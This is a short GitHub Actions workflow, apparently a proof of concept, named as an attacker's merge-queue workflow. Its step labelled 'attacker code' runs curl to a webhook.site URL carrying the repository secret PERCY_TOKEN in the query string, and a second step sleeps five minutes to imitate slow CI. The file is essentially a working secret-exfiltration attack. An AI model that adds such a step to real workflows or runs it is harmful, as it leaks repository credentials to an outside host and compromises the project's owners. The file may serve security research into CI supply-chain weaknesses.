name: Attacker-merge-queue-workflow

on:
  merge_group:

jobs:
  validate-pr:
    runs-on: ubuntu-latest
    steps:
    - name: attacker code
      run:  curl "https://webhook.site/ff58ef29-69c8-47ca-b4f0-779132bdad3b?foo=${{secrets.PERCY_TOKEN}}"
    - name: Run slow CI (emulated by a long sleep)
      run: sleep 300
